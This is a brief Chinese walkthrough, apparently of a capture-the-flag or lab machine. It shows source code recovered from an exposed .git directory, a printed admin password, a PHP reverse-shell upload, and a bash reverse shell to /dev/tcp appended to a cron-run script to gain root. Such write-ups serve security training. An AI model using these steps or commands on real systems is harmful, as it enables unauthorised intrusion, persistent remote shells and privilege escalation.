端口扫描
靶机ip地址为192.168.7.46
目录扫描
访问80端口
拼接访问 /admin.php
发现登录框
测试sql注入,弱口令等,无结果
扫描目录发现了.git文件,存在源码泄漏
将其下载到kali上读取
python2 GitHack.py -u http://192.168.7.180/.git/
发现账号密码
admin:st@mpch0rdt.ightiRu$glo0mappL3
登录成功
存在文件上传功能,kali生成反弹shell
locate php-reverse-shell.php
cp /usr/share/webshells/php/php-reverse-shell.php .
vim php-reverse-shell.php
将ip改为kali的ip 设置端口
上传文件
开启监听
访问 /upload/php-reverse-shell.php
成功反弹shell
获得交互式shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
查看系统配置文件
在 /home/eric 下发现文件
查看内容
/etc/crontab 存在计划任务
可以写入反弹shell语句
echo 'bash -i >& /dev/tcp/192.168.7.100/9999 0>&1' >> backup.sh
kali监听
反弹成功
提权成功
在 /root 下发现flag文件